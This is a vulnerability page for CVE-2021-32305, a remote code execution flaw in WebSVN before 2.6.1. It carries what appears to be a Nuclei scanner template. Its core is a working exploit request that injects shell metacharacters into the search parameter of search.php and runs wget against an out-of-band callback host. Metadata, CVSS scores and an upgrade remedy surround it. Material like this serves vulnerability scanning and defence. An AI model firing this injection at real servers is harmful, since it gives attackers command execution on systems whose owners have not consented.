CVE-2021-32305: Websvn <2.6.1 - Remote Code Execution

2025-08-01 Websvn PoC Public

Description

WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.

PoC

id: CVE-2021-32305

info:
  name: Websvn <2.6.1 - Remote Code Execution
  author: gy741
  severity: critical
  description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
    - https://github.com/websvnphp/websvn/pull/142
    - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32305
    - https://github.com/HimmelAward/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-32305
    cwe-id: CWE-78
    epss-score: 0.87304
    epss-percentile: 0.99744
    cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: websvn
    product: websvn
  tags: cve,cve2021,websvn,rce,oast,packetstorm,vkev,vuln

http:
  - raw:
      - |
        GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100dbc6943ce2bf2411f0cd860a839184a65013709c40bccd9a5b95030f0db9162a022025d86e0c7a5a4fc73cf888fcf8bb96122c0cf43a0823b893c03c8c32a9f8967a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities